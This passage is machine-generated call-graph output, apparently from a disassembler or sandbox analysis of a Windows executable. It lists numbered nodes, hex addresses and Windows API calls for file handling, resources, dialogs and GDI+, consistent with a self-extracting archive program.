23847->23848 23849 280c08 CloseHandle 23848->23849 23850 280b8f SetFilePointer 23848->23850 23849->23844 23850->23849 23851 280b9d ReadFile 23850->23851 23851->23849 23855 280bbb 23851->23855 23856 280c94 GetFileAttributesW 23853->23856 23858 280c5d CompareStringW 23853->23858 23859 280cac 23853->23859 23938 27b146 23853->23938 23941 28081b 23853->23941 23855->23849 23857 28081b 2 API calls 23855->23857 23856->23853 23856->23859 23857->23855 23858->23853 23861 280cec 23859->23861 23862 280cb7 23859->23862 23860 280dfb 23885 28a64d GetCurrentDirectoryW 23860->23885 23861->23860 23865 27b146 GetVersionExW 23861->23865 23863 280cd0 GetFileAttributesW 23862->23863 23864 280ce8 23862->23864 23863->23862 23863->23864 23864->23861 23866 280d06 23865->23866 23867 280d0d 23866->23867 23868 280d73 23866->23868 23870 28081b 2 API calls 23867->23870 23869 274092 _swprintf 51 API calls 23868->23869 23871 280d9b AllocConsole 23869->23871 23872 280d17 23870->23872 23873 280da8 GetCurrentProcessId AttachConsole 23871->23873 23874 280df3 ExitProcess 23871->23874 23875 28081b 2 API calls 23872->23875 23952 293e13 23873->23952 23877 280d21 23875->23877 23948 27e617 23877->23948 23878 280dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23878->23874 23881 274092 _swprintf 51 API calls 23882 280d4f 23881->23882 23883 27e617 53 API calls 23882->23883 23884 280d5e 23883->23884 23884->23874 23885->23678 23887 28081b 2 API calls 23886->23887 23888 28ac2a OleInitialize 23887->23888 23889 28ac4d GdiplusStartup SHGetMalloc 23888->23889 23889->23680 23893 28c5ce 23890->23893 23891 28c6e4 23891->23689 23891->23690 23892 281fac CharUpperW 23892->23893 23893->23891 23893->23892 23977 27f3fa 82 API calls 2 library calls 23893->23977 23896 28ec50 23895->23896 23897 28dbeb SetEnvironmentVariableW 23896->23897 23899 28dc0e 23897->23899 23898 28dc36 23898->23683 23899->23898 23900 28dc2a SetEnvironmentVariableW 23899->23900 23900->23898 23978 274065 23901->23978 23904 28b6dd LoadBitmapW 23905 28b70b GetObjectW 23904->23905 23906 28b6fe 23904->23906 23907 28b71a 23905->23907 24012 28a6c2 FindResourceW 23906->24012 24007 28a5c6 23907->24007 23912 28b770 23923 27da42 23912->23923 23913 28b74c 24026 28a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23913->24026 23914 28a6c2 12 API calls 23916 28b73d 23914->23916 23916->23913 23918 28b743 DeleteObject 23916->23918 23917 28b754 24027 28a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23917->24027 23918->23913 23920 28b75d 24028 28a80c 8 API calls 23920->24028 23922 28b764 DeleteObject 23922->23912 24039 27da67 23923->24039 23928 2890b7 24172 28eb38 23928->24172 23932 28acab GdiplusShutdown CoUninitialize 23931->23932 23932->23718 23934->23710 23935->23715 23937 28086d GetModuleHandleW 23936->23937 23937->23840 23937->23841 23939 27b15a GetVersionExW 23938->23939 23940 27b196 23938->23940 23939->23940 23940->23853 23942 28ec50 23941->23942 23943 280828 GetSystemDirectoryW 23942->23943 23944 28085e 23943->23944 23945 280840 23943->23945 23944->23853 23946 280851 LoadLibraryW 23945->23946 23946->23944 23947->23847 23949 27e627 23948->23949 23954 27e648 23949->23954 23953 293e1b 23952->23953 23953->23878 23953->23953 23960 27d9b0 23954->23960 23957 27e645 23957->23881 23958 27e66b LoadStringW 23958->23957 23959 27e682 LoadStringW 23958->23959 23959->23957 23965 27d8ec 23960->23965 23962 27d9cd 23963 27d9e2 23962->23963 23973 27d9f0 26 API calls 23962->23973 23963->23957 23963->23958 23966 27d904 23965->23966 23972 27d984 _strncpy 23965->23972 23968 27d928 23966->23968 23974 281da7 WideCharToMultiByte 23966->23974 23969 27d959 23968->23969 23975 27e5b1 50 API calls __vsnprintf 23968->23975 23976 296159 26 API calls 3 library calls 23969->23976 23972->23962 23973->23963 23974->23968 23975->23969 23976->23972 23977->23893 23979 27407c __vsnwprintf_l 23978->23979 23982 295fd4 23979->23982 23985 294097 23982->23985 23986 2940bf 23985->23986 23987 2940d7 23985->23987 24002 2991a8 20 API calls __dosmaperr 23986->24002 23987->23986 23988 2940df 23987->23988 23990 294636 __cftof 38 API calls 23988->23990 23993 2940ef 23990->23993 23991 2940c4 24003 299087 26 API calls __cftof 23991->24003 24004 294601 20 API calls 2 library calls 23993->24004 23994 28fbbc CatchGuardHandler 5 API calls 23996 274086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23994->23996 23996->23904 23997 294167 24005 2949e6 51 API calls 3 library calls 23997->24005 24000 2940cf 24000->23994 24001 294172 24006 2946b9 20 API calls _free 24001->24006 24002->23991 24003->24000 24004->23997 24005->24001 24006->24000 24029 28a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24007->24029 24009 28a5cd 24010 28a5d9 24009->24010 24030 28a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24009->24030 24010->23912 24010->23913 24010->23914 24013 28a6e5 SizeofResource 24012->24013 24018 28a7d3 24012->24018 24014 28a6fc LoadResource 24013->24014 24013->24018 24015 28a711 LockResource 24014->24015 24014->24018 24016 28a722 GlobalAlloc 24015->24016 24015->24018 24017 28a73d GlobalLock 24016->24017 24016->24018 24019 28a7cc GlobalFree 24017->24019 24020 28a74c __InternalCxxFrameHandler 24017->24020 24018->23905 24018->23907 24019->24018 24021 28a7c5 GlobalUnlock 24020->24021 24031 28a626 GdipAlloc 24020->24031 24021->24019 24024 28a79a GdipCreateHBITMAPFromBitmap 24025 28a7b0 24024->24025 24025->24021 24026->23917 24027->23920 24028->23922 24029->24009 24030->24010 24032 28a638 24031->24032 24033 28a645 24031->24033 24035 28a3b9 24032->24035 24033->24021 24033->24024 24033->24025 24036 28a3da GdipCreateBitmapFromStreamICM 24035->24036 24037 28a3e1 GdipCreateBitmapFromStream 24035->24037 24038 28a3e6 24036->24038 24037->24038 24038->24033 24040 27da75 _wcschr __EH_prolog 24039->24040 24041 27daa4 GetModuleFileNameW 24040->24041 24042 27dad5 24040->24042 24043 27dabe 24041->24043 24085 2798e0 24042->24085 24043->24042 24045 27db31 24096 296310 24045->24096 24047 27e261 78 API calls 24050 27db05 24047->24050 24050->24045 24050->24047 24063 27dd4a 24050->24063 24051 27db44 24052 296310 26 API calls 24051->24052 24060 27db56 ___vcrt_FlsSetValue 24052->24060 24053 27dc85 24053->24063 24132 279d70 81 API calls 24053->24132 24057 27dc9f ___std_exception_copy 24058 279bd0 82 API calls 24057->24058 24057->24063 24061 27dcc8 ___std_exception_copy 24058->24061 24060->24053 24060->24063 24110 279e80 24060->24110 24126 279bd0 24060->24126 24131 279d70 81 API calls 24060->24131 24061->24063 24079 27dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24061->24079 24133 281b84 MultiByteToWideChar 24061->24133 24119 27959a 24063->24119 24064 27e159 24070 27e1de 24064->24070 24139 298cce 26 API calls 2 library calls 24064->24139 24066 27e16e 24140 297625 26 API calls 2 library calls 24066->24140 24068 27e1c6 24141 27e27c 78 API calls 24068->24141 24069 27e214 24074 296310 26 API calls 24069->24074 24070->24069 24073 27e261 78 API calls 24070->24073 24073->24070 24075 27e22d 24074->24075 24076 296310 26 API calls 24075->24076 24076->24063 24079->24063 24079->24064 24080 281da7 WideCharToMultiByte 24079->24080 24134 27e5b1 50 API calls __vsnprintf 24079->24134 24135 296159 26 API calls 3 library calls 24079->24135 24136 298cce 26 API calls 2 library calls 24079->24136 24137 297625 26 API calls 2 library calls 24079->24137 24138 27e27c 78 API calls 24079->24138 24080->24079 24083 27e29e GetModuleHandleW FindResourceW 24084 27da55 24083->24084 24084->23928 24086 2798ea 24085->24086 24087 27994b CreateFileW 24086->24087 24088 27996c GetLastError 24087->24088 24092 2799bb 24087->24092 24142 27bb03 24088->24142 24090 27998c 24091 279990 CreateFileW GetLastError 24090->24091 24090->24092 24091->24092 24094 2799b5 24091->24094 24093 2799ff 24092->24093 24095 2799e5 SetFileTime 24092->24095 24093->24050 24094->24092 24095->24093 24097 296349 24096->24097 24098 29634d 24097->24098 24109 296375 24097->24109 24146 2991a8 20 API calls __dosmaperr 24098->24146 24100 296352 24147 299087 26 API calls __cftof 24100->24147 24102 28fbbc CatchGuardHandler 5 API calls 24104 2966a6 24102->24104 24103 29635d 24105 28fbbc CatchGuardHandler 5 API calls 24103->24105 24104->24051 24106 296369 24105->24106 24106->24051 24108 296699 24108->24102 24109->24108 24148 296230 5 API calls CatchGuardHandler 24109->24148 24111 279e92 24110->24111 24116 279ea5 24110->24116 24112 279eb0 24111->24112 24149 276d5b 77 API calls 24111->24149 24112->24060 24113 279eb8 SetFilePointer 24113->24112 24115 279ed4 GetLastError 24113->24115 24115->24112 24117 279ede 24115->24117 24116->24112 24116->24113 24117->24112 24150 276d5b 77 API calls 24117->24150 24120 2795be 24119->24120 24125 2795cf 24119->24125 24121 2795d1 24120->24121 24122 2795ca 24120->24122 24120->24125 24156 279620 24121->24156 24151 27974e 24122->24151 24125->24083 24127 279bdc 24126->24127 24128 279be3 24126->24128 24127->24060 24128->24127 24130 279785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24128->24130 24171 276d1a 77 API calls 24128->24171 24130->24128 24131->24060 24132->24057 24133->24079 24134->24079 24135->24079 24136->24079 24137->24079 24138->24079 24139->24066 24140->24068 24141->24070 24143 27bb10 _wcslen 24142->24143 24144 27bbb8 GetCurrentDirectoryW 24143->24144 24145 27bb39 _wcslen 24143->24145 24144->24145 24145->24090 24146->24100 24147->24103 24148->24109 24149->24116 24150->24112 24152 279781 24151->24152 24155 279757 24151->24155 24152->24125 24155->24152 24162 27a1e0 24155->24162 24157 27964a 24156->24157 24158 27962c 24156->24158 24159 279669 24157->24159 24170 276bd5 76 API calls 24157->24170 24158->24157 24160 279638 CloseHandle 24158->24160 24159->24125 24160->24157 24163 28ec50 24162->24163 24164 27a1ed DeleteFileW 24163->24164 24165 27a200 24164->24165 24166 27977f 24164->24166 24167 27bb03 GetCurrentDirectoryW 24165->24167 24166->24125 24168 27a214 24167->24168 24168->24166 24169 27a218 DeleteFileW 24168->24169 24169->24166 24170->24159 24171->24128 24173 28eb3d ___std_exception_copy 24172->24173 24174 2890d6 24173->24174 24177 28eb59 24173->24177 24181 297a5e 7 API calls 2 library calls 24173->24181 24174->23702 24176 28f5c9 24183 29238d RaiseException 24176->24183 24177->24176 24182 29238d RaiseException 24177->24182 24179 28f5e6 24181->24173 24182->24176 24183->24179 24185 297ce1 _unexpected 24184->24185 24186 297ce8 24185->24186 24187 297cfa 24185->24187 24220 297e2f GetModuleHandleW 24186->24220 24208 29ac31 EnterCriticalSection 24187->24208 24190 297ced 24190->24187 24221 297e73 GetModuleHandleExW 24190->24221 24195 297d01 24205 297d9f 24195->24205 24207 297d76 24195->24207 24229 2987e0 20 API calls _abort 24195->24229 24196 297de8 24230 2a2390 5 API calls CatchGuardHandler 24196->24230 24197 297dbc 24212 297dee 24197->24212 24198 297d8e 24200 298a91 _abort 5 API calls 24198->24200 24199 298a91 _abort 5 API calls 24199->24198 24200->24205 24209 297ddf 24205->24209 24207->24198 24207->24199 24208->24195 24231 29ac81 LeaveCriticalSection 24209->24231 24211 297db8 24211->24196 24211->24197 24232 29b076 24212->24232 24215 297e1c 24218 297e73 _abort 8 API calls 24215->24218 24216 297dfc GetPEB 24216->24215 24217 297e0c GetCurrentProcess TerminateProcess 24216->24217 24217->24215 24219 297e24 ExitProcess 24218->24219 24220->24190 24222 297e9d GetProcAddress 24221->24222 24223 297ec0 24221->24223 24224 297eb2 24222->24224 24225 297ecf 24223->24225 24226 297ec6 FreeLibrary 24223->24226 24224->24223 24227 28fbbc CatchGuardHandler 5 API calls 24225->24227 24226->24225 24228 297cf9 24227->24228 24228->24187 24229->24207 24231->24211 24233 29b09b 24232->24233 24234 29b091 24232->24234 24235 29ac98 _unexpected 5 API calls 24233->24235 24236 28fbbc CatchGuardHandler 5 API calls 24234->24236 24235->24234 24237 297df8 24236->24237 24237->24215 24237->24216 25312 28c793 97 API calls 4 library calls 25340 28b18d 78 API calls 25341 289580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25356 28c793 102 API calls 5 library calls 25315 29b49d 6 API calls CatchGuardHandler 24257 2713e1 84 API calls 2 library calls 24259 28b7e0 24260 28b7ea __EH_prolog 24259->24260 24425 271316 24260->24425 24263 28b841 24264 28b82a 24264->24263 24267 28b838 24264->24267 24268 28b89b 24264->24268 24265 28bf0f 24490 28d69e 24265->24490 24273 28b878 24267->24273 24274 28b83c 24267->24274 24272 28b92e GetDlgItemTextW 24268->24272 24278 28b8b1 24268->24278 24270 28bf38 24275 28bf41 SendDlgItemMessageW 24270->24275 24276 28bf52 GetDlgItem SendMessageW 24270->24276 24271 28bf2a SendMessageW 24271->24270 24272->24273 24277 28b96b 24272->24277 24273->24263 24280 28b95f KiUserCallbackDispatcher 24273->24280 24274->24263 24283 27e617 53 API calls 24274->24283 24275->24276 24508 28a64d GetCurrentDirectoryW 24276->24508 24281 28b980 GetDlgItem 24277->24281 24423 28b974 24277->24423 24282 27e617 53 API calls 24278->24282 24280->24263 24286 28b994 SendMessageW SendMessageW 24281->24286 24287 28b9b7 SetFocus 24281->24287 24288 28b8ce SetDlgItemTextW 24282->24288 24284 28b85b 24283->24284 24530 27124f SHGetMalloc 24284->24530 24285 28bf82 GetDlgItem 24290 28bf9f 24285->24290 24291 28bfa5 SetWindowTextW 24285->24291 24286->24287 24292 28b9c7 24287->24292 24303 28b9e0 24287->24303 24293 28b8d9 24288->24293 24290->24291 24509 28abab GetClassNameW 24291->24509 24297 27e617 53 API calls 24292->24297 24293->24263 24300 28b8e6 GetMessageW 24293->24300 24294 28b862 24294->24263 24302 28c1fc SetDlgItemTextW 24294->24302 24295 28be55 24298 27e617 53 API calls 24295->24298 24301 28b9d1 24297->24301 24304 28be65 SetDlgItemTextW 24298->24304 24300->24263 24306 28b8fd IsDialogMessageW 24300->24306 24531 28d4d4 24301->24531 24302->24263 24311 27e617 53 API calls 24303->24311 24308 28be79 24304->24308 24306->24293 24310 28b90c TranslateMessage DispatchMessageW 24306->24310 24313 27e617 53 API calls 24308->24313 24310->24293 24312 28ba17 24311->24312 24316 274092 _swprintf 51 API calls 24312->24316 24339 28be9c _wcslen 24313->24339 24314 28bff0 24315 28c020 24314->24315 24321 27e617 53 API calls 24314->24321 24322 28c0d8 24315->24322 24327 28c73f 97 API calls 24315->24327 24323 28ba29 24316->24323 24317 28b9d9 24435 27a0b1 24317->24435 24319 28c73f 97 API calls 24319->24314 24326 28c003 SetDlgItemTextW 24321->24326 24329 28c18b 24322->24329 24362 28c169 24322->24362 24372 27e617 53 API calls 24322->24372 24328 28d4d4 16 API calls 24323->24328 24324 28ba68 GetLastError 24325 28ba73 24324->24325 24441 28ac04 SetCurrentDirectoryW 24325->24441 24330 27e617 53 API calls 24326->24330 24332 28c03b 24327->24332 24328->24317 24333 28c19d 24329->24333 24334 28c194 EnableWindow 24329->24334 24335 28c017 SetDlgItemTextW 24330->24335 24345 28c04d 24332->24345 24369 28c072 24332->24369 24341 28c1ba 24333->24341 24549 2712d3 GetDlgItem EnableWindow 24333->24549 24334->24333 24335->24315 24336 28ba87 24343 28ba90 GetLastError 24336->24343 24344 28ba9e 24336->24344 24337 27e617 53 API calls 24337->24263 24338 28c0cb 24347 28c73f 97 API calls 24338->24347 24350 27e617 53 API calls 24339->24350 24373 28beed 24339->24373 24342 28c1e1 24341->24342 24355 28c1d9 SendMessageW 24341->24355 24342->24263 24357 27e617 53 API calls 24342->24357 24343->24344 24348 28bb11 24344->24348 24351 28bb20 24344->24351 24356 28baae GetTickCount 24344->24356 24547 289ed5 32 API calls 24345->24547 24346 28c1b0 24550 2712d3 GetDlgItem EnableWindow 24346->24550 24347->24322 24348->24351 24352 28bd56 24348->24352 24358 28bed0 24350->24358 24359 28bcfb 24351->24359 24360 28bb39 GetModuleFileNameW 24351->24360 24361 28bcf1 24351->24361 24450 2712f1 GetDlgItem ShowWindow 24352->24450 24353 28c066 24353->24369 24355->24342 24364 274092 _swprintf 51 API calls 24356->24364 24357->24294 24365 274092 _swprintf 51 API calls 24358->24365 24368 27e617 53 API calls 24359->24368 24541 27f28c 82 API calls 24360->24541 24361->24273 24361->24359 24548 289ed5 32 API calls 24362->24548 24371 28bac7 24364->24371 24365->24373 24376 28bd05 24368->24376 24369->24338 24377 28c73f 97 API calls 24369->24377 24370 28bd66 24451 2712f1 GetDlgItem ShowWindow 24370->24451 24442 27966e 24371->24442 24372->24322 24373->24337 24374 28bb5f 24379 274092 _swprintf 51 API calls 24374->24379 24375 28c188 24375->24329 24380 274092 _swprintf 51 API calls 24376->24380 24381 28c0a0 24377->24381 24384 28bb81 CreateFileMappingW 24379->24384 24385 28bd23 24380->24385 24381->24338 24386 28c0a9 DialogBoxParamW 24381->24386 24382 28bd70 24387 27e617 53 API calls 24382->24387 24390 28bbe3 GetCommandLineW 24384->24390 24418 28bc60 __InternalCxxFrameHandler 24384->24418 24398 27e617 53 API calls 24385->24398 24386->24273 24386->24338 24388 28bd7a SetDlgItemTextW 24387->24388 24452 2712f1 GetDlgItem ShowWindow 24388->24452 24389 28baed 24392 28baff 24389->24392 24393 28baf4 GetLastError 24389->24393 24394 28bbf4 24390->24394 24396 27959a 80 API calls 24392->24396 24393->24392 24542 28b425 SHGetMalloc 24394->24542 24395 28bd8c SetDlgItemTextW GetDlgItem 24399 28bda9 GetWindowLongW SetWindowLongW 24395->24399 24400 28bdc1 24395->24400 24396->24348 24402 28bd3d 24398->24402 24399->24400 24453 28c73f 24400->24453 24401 28bc10 24543 28b425 SHGetMalloc 24401->24543 24406 28bc1c 24544 28b425 SHGetMalloc 24406->24544 24407 28c73f 97 API calls 24409 28bddd 24407->24409 24478 28da52 24409->24478 24410 28bc28 24545 27f3fa 82 API calls 2 library calls 24410->24545 24411 28bccb 24411->24361 24417 28bce1 UnmapViewOfFile CloseHandle 24411->24417 24415 28bc3f MapViewOfFile 24415->24418 24416 28c73f 97 API calls 24422 28be03 24416->24422 24417->24361 24418->24411 24419 28bcb7 Sleep 24418->24419 24419->24411 24419->24418 24420 28be2c 24546 2712d3 GetDlgItem EnableWindow 24420->24546 24422->24420 24424 28c73f 97 API calls 24422->24424 24423->24273 24423->24295 24424->24420 24426 27131f 24425->24426 24427 271378 24425->24427 24428 271385 24426->24428 24551 27e2e8 62 API calls 2 library calls 24426->24551 24552 27e2c1 GetWindowLongW SetWindowLongW 24427->24552 24428->24263 24428->24264 24428->24265 24431 271341 24431->24428 24432 271354 GetDlgItem 24431->24432 24432->24428 24433 271364 24432->24433 24433->24428 24434 27136a SetWindowTextW 24433->24434 24434->24428 24438 27a0bb 24435->24438 24436 27a14c 24437 27a2b2 8 API calls 24436->24437 24439 27a175 24436->24439 24437->24439 24438->24436 24438->24439 24553 27a2b2 24438->24553 24439->24324 24439->24325 24441->24336 24443 279678 24442->24443 24444 2796d5 CreateFileW 24443->24444 24445 2796c9 24443->24445 24444->24445 24446 27971f 24445->24446 24447 27bb03 GetCurrentDirectoryW 24445->24447 24446->24389 24448 279704 24447->24448 24448->24446 24449 279708 CreateFileW 24448->24449 24449->24446 24450->24370 24451->24382 24452->24395 24454 28c749 __EH_prolog 24453->24454 24455 28bdcf 24454->24455 24585 28b314 24454->24585 24455->24407 24458 28b314 ExpandEnvironmentStringsW 24462 28c780 _wcslen _wcsrchr 24458->24462 24459 28ca67 SetWindowTextW 24459->24462 24462->24455 24462->24458 24462->24459 24465 28c855 SetFileAttributesW 24462->24465 24471 28cc31 GetDlgItem SetWindowTextW SendMessageW 24462->24471 24473 28cc71 SendMessageW 24462->24473 24589 281fbb CompareStringW 24462->24589 24590 28a64d GetCurrentDirectoryW 24462->24590 24592 27a5d1 6 API calls 24462->24592 24593 27a55a FindClose 24462->24593 24594 28b48e 76 API calls 2 library calls 24462->24594 24595 293e3e 24462->24595 24467 28c90f GetFileAttributesW 24465->24467 24477 28c86f _abort _wcslen 24465->24477 24467->24462 24469 28c921 DeleteFileW 24467->24469 24469->24462 24470 28c932 24469->24470 24472 274092 _swprintf 51 API calls 24470->24472 24471->24462 24474 28c952 GetFileAttributesW 24472->24474 24473->24462 24474->24470 24475 28c967 MoveFileW 24474->24475 24475->24462 24476 28c97f MoveFileExW 24475->24476 24476->24462 24477->24462 24477->24467 24591 27b991 51 API calls 3 library calls 24477->24591 24479 28da5c __EH_prolog 24478->24479 24610 280659 24479->24610 24481 28da8d 24614 275b3d 24481->24614 24483 28daab 24618 277b0d 24483->24618 24487 28dafe 24634 277b9e 24487->24634 24489 28bdee 24489->24416 24491 28d6a8 24490->24491 24492 28a5c6 4 API calls 24491->24492 24493 28d6ad 24492->24493 24494 28d6b5 GetWindow 24493->24494 24495 28bf15 24493->24495 24494->24495 24498 28d6d5 24494->24498 24495->24270 24495->24271 24496 28d6e2 GetClassNameW 25120 281fbb CompareStringW 24496->25120 24498->24495 24498->24496 24499 28d76a GetWindow 24498->24499 24500 28d706 GetWindowLongW 24498->24500 24499->24495 24499->24498 24500->24499 24501 28d716 SendMessageW 24500->24501 24501->24499 24502 28d72c GetObjectW 24501->24502 25121 28a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24502->25121 24504 28d743 25122 28a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24504->25122 25123 28a80c 8 API calls 24504->25123 24507 28d754 SendMessageW DeleteObject 24507->24499 24508->24285 24510 28abcc 24509->24510 24511 28abf1 24509->24511 25124 281fbb CompareStringW 24510->25124 24512 28abff 24511->24512 24513 28abf6 SHAutoComplete 24511->24513 24517 28b093 24512->24517 24513->24512 24515 28abdf 24515->24511 24516 28abe3 FindWindowExW 24515->24516 24516->24511 24518 28b09d __EH_prolog 24517->24518 24519 2713dc 84 API calls 24518->24519 24520 28b0bf 24519->24520 25125 271fdc 24520->25125 24523 28b0d9 24525 271692 86 API calls 24523->24525 24524 28b0eb 24526 2719af 128 API calls 24524->24526 24527 28b0e4 24525->24527 24529 28b10d __InternalCxxFrameHandler ___std_exception_copy 24526->24529 24527->24314 24527->24319 24528 271692 86 API calls 24528->24527 24529->24528 24530->24294 25133 28b568 PeekMessageW 24531->25133 24534 28d502 24538 28d50d ShowWindow SendMessageW SendMessageW 24534->24538 24535 28d536 SendMessageW SendMessageW 24536 28d591 SendMessageW SendMessageW SendMessageW 24535->24536 24537 28d572 24535->24537 24539 28d5c4 SendMessageW 24536->24539 24540 28d5e7 SendMessageW 24536->24540 24537->24536 24538->24535 24539->24540 24540->24317 24541->24374 24542->24401 24543->24406 24544->24410 24545->24415 24546->24423 24547->24353 24548->24375 24549->24346 24550->24341 24551->24431 24552->24428 24554 27a2bf 24553->24554 24555 27a2e3 24554->24555 24556 27a2d6 CreateDirectoryW 24554->24556 24574 27a231 24555->24574 24556->24555 24559 27a316 24556->24559 24563 27a325 24559->24563 24566 27a4ed 24559->24566 24560 27a329 GetLastError 24560->24563 24561 27bb03 GetCurrentDirectoryW 24564 27a2ff 24561->24564 24563->24438 24564->24560 24565 27a303 CreateDirectoryW 24564->24565 24565->24559 24565->24560 24567 28ec50 24566->24567 24568 27a4fa SetFileAttributesW 24567->24568 24569 27a510 24568->24569 24570 27a53d 24568->24570 24571 27bb03 GetCurrentDirectoryW 24569->24571 24570->24563 24572 27a524 24571->24572 24572->24570 24573 27a528 SetFileAttributesW 24572->24573 24573->24570 24577 27a243 24574->24577 24578 28ec50 24577->24578 24579 27a250 GetFileAttributesW 24578->24579 24580 27a261 24579->24580 24581 27a23a 24579->24581 24582 27bb03 GetCurrentDirectoryW 24580->24582 24581->24560 24581->24561 24583 27a275 24582->24583 24583->24581 24584 27a279 GetFileAttributesW 24583->24584 24584->24581 24586 28b31e 24585->24586 24587 28b3f0 ExpandEnvironmentStringsW 24586->24587 24588 28b40d 24586->24588 24587->24588 24588->24462 24589->24462 24590->24462 24591->24477 24592->24462 24593->24462 24594->24462 24596 298e54 24595->24596 24597 298e6c 24596->24597 24598 298e61 24596->24598 24600 298e74 24597->24600 24606 298e7d _unexpected 24597->24606 24599 298e06 __vsnwprintf_l 21 API calls 24598->24599 24604 298e69 24599->24604 24601 298dcc _free 20 API calls 24600->24601 24601->24604 24602 298e82 24608 2991a8 20 API calls __dosmaperr 24602->24608 24603 298ea7 HeapReAlloc 24603->24604 24603->24606 24604->24462 24606->24602 24606->24603 24609 297a5e 7 API calls 2 library calls 24606->24609 24608->24604 24609->24606 24611 280666 _wcslen 24610->24611 24638 2717e9 24611->24638 24613 28067e 24613->24481 24615 280659 _wcslen 24614->24615 24616 2717e9 78 API calls 24615->24616 24617 28067e 24616->24617 24617->24483 24619 277b17 __EH_prolog 24618->24619 24655 27ce40 24619->24655 24621 277b32 24622 28eb38 8 API calls 24621->24622 24623 277b5c 24622->24623 24661 284a76 24623->24661 24626 277c7d 24627 277c87 24626->24627 24629 277cf1 24627->24629 24690 27a56d 24627->24690 24632 277d50 24629->24632 24668 278284 24629->24668 24630 277d92 24630->24487 24632->24630 24696 27138b 74 API calls 24632->24696 24635 277bac 24634->24635 24637 277bb3 24634->24637 24636 282297 86 API calls 24635->24636 24636->24637 24639 2717ff 24638->24639 24650 27185a __InternalCxxFrameHandler 24638->24650 24640 271828 24639->24640 24651 276c36 76 API calls __vswprintf_c_l 24639->24651 24642 271887 24640->24642 24645 271847 ___std_exception_copy 24640->24645 24644 293e3e 22 API calls 24642->24644 24643 27181e 24652 276ca7 75 API calls 24643->24652 24647 27188e 24644->24647 24645->24650 24653 276ca7 75 API calls 24645->24653 24647->24650 24654 276ca7 75 API calls 24647->24654 24650->24613 24651->24643 24652->24640 24653->24650 24654->24650 24656 27ce4a __EH_prolog 24655->24656 24657 28eb38 8 API calls 24656->24657 24658 27ce8d 24657->24658 24659 28eb38 8 API calls 24658->24659 24660 27ceb1 24659->24660 24660->24621 24662 284a80 __EH_prolog 24661->24662 24663 28eb38 8 API calls 24662->24663 24664 284a9c 24663->24664 24665 277b8b 24664->24665 24667 280e46 80 API calls 24664->24667 24665->24626 24667->24665 24669 27828e __EH_prolog 24668->24669 24697 2713dc 24669->24697 24671 2782aa 24672 2782bb 24671->24672 24837 279f42 24671->24837 24675 2782f2 24672->24675 24705 271a04 24672->24705 24833 271692 24675->24833 24678 2782ee 24678->24675 24686 27a56d 7 API calls 24678->24686 24688 278389 24678->24688 24841 27c0c5 CompareStringW _wcslen 24678->24841 24682 2783e8 24729 271f6d 24682->24729 24686->24678 24687 2783f3 24687->24675 24733 273b2d 24687->24733 24745 27848e 24687->24745 24724 278430 24688->24724 24691 27a582 24690->24691 24692 27a5b0 24691->24692 25109 27a69b 24691->25109 24692->24627 24694 27a592 24694->24692 24695 27a597 FindClose 24694->24695 24695->24692 24696->24630 24698 2713e1 __EH_prolog 24697->24698 24699 27ce40 8 API calls 24698->24699 24700 271419 24699->24700 24701 28eb38 8 API calls 24700->24701 24704 271474 _abort 24700->24704 24702 271461 24701->24702 24702->24704 24843 27b505 24702->24843 24704->24671 24706 271a0e __EH_prolog 24705->24706 24718 271a61 24706->24718 24721 271b9b 24706->24721 24859 2713ba 24706->24859 24709 271bc7 24862 27138b 74 API calls 24709->24862 24711 273b2d 101 API calls 24715 271c12 24711->24715 24712 271bd4 24712->24711 24712->24721 24713 271c5a 24717 271c8d 24713->24717 24713->24721 24863 27138b 74 API calls 24713->24863 24715->24713 24716 273b2d 101 API calls 24715->24716 24716->24715 24717->24721 24722 279e80 79 API calls 24717->24722 24718->24709 24718->24712 24718->24721 24719 273b2d 101 API calls 24720 271cde 24719->24720 24720->24719 24720->24721 24721->24678 24722->24720 24723 279e80 79 API calls 24723->24718 24881 27cf3d 24724->24881 24726 278440 24885 2813d2 GetSystemTime SystemTimeToFileTime 24726->24885 24728 2783a3 24728->24682 24842 281b66 72 API calls 24728->24842 24730 271f72 __EH_prolog 24729->24730 24732 271fa6 24730->24732 24890 2719af 24730->24890 24732->24687 24734 273b3d 24733->24734 24735 273b39 24733->24735 24744 279e80 79 API calls 24734->24744 24735->24687 24736 273b4f 24737 273b6a 24736->24737 24738 273b78 24736->24738 24739 273baa 24737->24739 25043 2732f7 89 API calls 2 library calls 24737->25043 25044 27286b 101 API calls 3 library calls 24738->25044 24739->24687 24742 273b76 24742->24739 25045 2720d7 74 API calls 24742->25045 24744->24736 24746 278498 __EH_prolog 24745->24746 24751 2784d5 24746->24751 24764 278513 24746->24764 25070 288c8d 103 API calls 24746->25070 24747 2784f5 24749 27851c 24747->24749 24750 2784fa 24747->24750 24749->24764 25072 288c8d 103 API calls 24749->25072 24750->24764 25071 277a0d 152 API calls 24750->25071 24751->24747 24752 27857a 24751->24752 24751->24764 24752->24764 25046 275d1a 24752->25046 24756 278605 24756->24764 25052 278167 24756->25052 24759 278797 24760 27a56d 7 API calls 24759->24760 24762 278802 24759->24762 24760->24762 24761 27d051 82 API calls 24770 27885d 24761->24770 25058 277c0d 24762->25058 24764->24687 24765 27898b 25075 272021 74 API calls 24765->25075 24766 278a5f 24771 278ab6 24766->24771 24786 278a6a 24766->24786 24767 278992 24767->24766 24775 2789e1 24767->24775 24770->24761 24770->24764 24770->24765 24770->24767 25073 278117 84 API calls 24770->25073 25074 272021 74 API calls 24770->25074 24779 278a4c 24771->24779 25078 277fc0 97 API calls 24771->25078 24772 279105 24778 27959a 80 API calls 24772->24778 24773 278b14 24773->24772 24793 278b82 24773->24793 25079 2798bc 24773->25079 24774 278ab4 24780 27959a 80 API calls 24774->24780 24775->24773 24776 27a231 3 API calls 24775->24776 24775->24779 24781 278a19 24776->24781 24778->24764 24779->24773 24779->24774 24780->24764 24781->24779 25076 2792a3 97 API calls 24781->25076 24782 